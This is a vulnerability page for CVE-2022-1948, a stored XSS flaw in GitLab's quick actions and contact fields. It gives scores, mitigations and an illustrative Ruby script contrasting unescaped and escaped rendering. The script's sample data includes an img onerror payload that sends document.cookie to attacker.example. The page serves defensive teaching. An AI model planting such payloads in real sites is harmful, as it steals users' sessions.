Cyber Resilience

CVE-2022-1948

Severity: High
Published: 28 July 2022
Modified: 21 November 2024
KEV Added: not listed
Patch: GitLab 15.0.1
CVSS v3.1 Score: 8.7 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N)
EPSS Score: 0.0134 (80.4th percentile)
Risk Priority: 18 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2022-1948 is a high-severity cross-site scripting (CWE-79) vulnerability in GitLab. Its CVSS v3.1 base score is 8.7 (High).

Operationally, it ranks in the top 19.6% of CVEs by EPSS exploit likelihood; it is not currently listed in the CISA KEV catalog.

Deeper analysis

CVE-2022-1948 is a cross-site scripting vulnerability (CWE-79) affecting GitLab 15.0.0, that is, all versions from 15.0 before 15.0.1. It stems from missing validation of input supplied through quick actions, which allowed HTML to be injected into contact details fields and stored.

An authenticated attacker with low privileges (PR:L) could supply crafted input that, once another user views the rendered contact details (UI:R), executes arbitrary script in that user's session. The vector's changed scope (S:C) with high confidentiality and integrity impact reflects that the script acts with the victim's GitLab privileges, for example reading or modifying data the victim can access; availability is not affected (A:N).

GitLab's public advisory and the CVE JSON record reference the issue and direct users to upgrade to version 15.0.1, where the input validation was corrected.

EPSS for the CVE rose from a low baseline to a peak of 0.2332 on 2025-12-11 before receding to the current 0.0134. EPSS is a model estimate of the probability of exploitation within the next 30 days, so the spike marks a period of elevated predicted exploitation probability more than three years after disclosure; it is not evidence of confirmed exploitation, and the CVE remains outside the KEV catalog.

Vulnerability details

An issue has been discovered in GitLab affecting all versions starting from 15.0 before 15.0.1. Missing validation of input used in quick actions allowed an attacker to exploit XSS by injecting HTML in contact details.

CWE(s)

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Related Threats

No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.

Affected Assets

Vendor: gitlab
Product: gitlab
Version: 15.0.0

Mitigating Controls

Likely Mitigating Controls (AI-derived)

Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.

Penetration testing (addresses CWE-79): submitting XSS payloads to the application's input fields, in this case the quick actions and contact details fields, to detect cross-site scripting flaws for subsequent remediation.

Input validation (addresses CWE-79): rejecting web inputs that carry script-related content before they are stored. An allow-list of the characters a field may legitimately contain is more robust than blocking known script patterns, and validation alone does not substitute for encoding at output.

Output encoding (addresses CWE-79): encoding or sanitizing user-controlled values when generating web pages so that any stored script content is rendered inert, which removes exploitability even when an input check is bypassed.
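As an added illustration, not GitLab's code and not the 15.0.1 fix, the Ruby below contrasts the CWE-79 pattern described in the analysis above, user-controlled contact fields interpolated straight into HTML, with the two controls listed here: escaping at the output boundary and allow-list validation of the stored fields. The contact records, field names, patterns and helper names are constructed for the example; the quick-action parsing path itself is not reproduced.

```ruby
require "erb"

# Constructed sample records for the example (not GitLab data). One contact carries a
# payload in an attacker-controlled field, the other is a benign contact with an
# apostrophe that naive blocklists often mishandle.
ATTACKER_CONTACT = {
  first_name: "Mallory",
  last_name:  "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">",
  email:      "mallory@example.com"
}.freeze

BENIGN_CONTACT = {
  first_name: "Alice",
  last_name:  "O'Brien",
  email:      "alice@example.com"
}.freeze

# The CWE-79 pattern: user-controlled contact fields are interpolated straight into an
# HTML fragment, so stored HTML is emitted verbatim and runs in whichever user's
# browser renders the contact list.
def render_contact_vulnerable(contact)
  "<li class=\"contact\">#{contact[:first_name]} #{contact[:last_name]} " \
    "&lt;#{contact[:email]}&gt;</li>"
end

# Hardened rendering: every user-controlled value is HTML-escaped at the output
# boundary, so '<', '>', '&' and quotes become entities and no tag survives.
def h(value)
  ERB::Util.html_escape(value.to_s)
end

def render_contact_safe(contact)
  "<li class=\"contact\">#{h(contact[:first_name])} #{h(contact[:last_name])} " \
    "&lt;#{h(contact[:email])}&gt;</li>"
end

# Second layer, corresponding to the input-validation control: allow-list the
# characters a contact field may contain instead of blocklisting script fragments.
# Illustrative patterns; a real deployment would tune them to its data.
NAME_PATTERN  = /\A[[:alpha:]][[:alpha:] .'\-]{0,254}\z/
EMAIL_PATTERN = /\A[^@\s<>"']+@[^@\s<>"']+\.[^@\s<>"']+\z/

def validate_contact(contact)
  errors = []
  errors << "first_name rejected" unless NAME_PATTERN.match?(contact[:first_name].to_s)
  errors << "last_name rejected"  unless NAME_PATTERN.match?(contact[:last_name].to_s)
  errors << "email rejected"      unless EMAIL_PATTERN.match?(contact[:email].to_s)
  errors
end

# Rough check for the demonstration: element names that appear in the fragment
# beyond the <li> wrapper the template itself emits.
def unexpected_tags(html)
  html.scan(/<\/?([a-zA-Z][\w-]*)/).flatten.uniq - ["li"]
end

if __FILE__ == $PROGRAM_NAME
  puts "vulnerable: #{render_contact_vulnerable(ATTACKER_CONTACT)}"
  puts "  extra tags: #{unexpected_tags(render_contact_vulnerable(ATTACKER_CONTACT)).inspect}"
  puts "safe:       #{render_contact_safe(ATTACKER_CONTACT)}"
  puts "  extra tags: #{unexpected_tags(render_contact_safe(ATTACKER_CONTACT)).inspect}"
  puts "validation (attacker): #{validate_contact(ATTACKER_CONTACT).inspect}"
  puts "validation (benign):   #{validate_contact(BENIGN_CONTACT).inspect}"
end
```

Run with `ruby contact_xss_example.rb`. The vulnerable renderer leaks the injected img element into the page, the escaped renderer emits only the li wrapper, and the allow-list rejects the attacker's last_name while accepting the apostrophe in "O'Brien". In a Rails view, ERB `<%= %>` performs this escaping by default; the bug class arises when a value is marked `html_safe`, emitted with `raw`, or assembled by string building as above, which is why the output-encoding control matters independently of where input validation sits.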
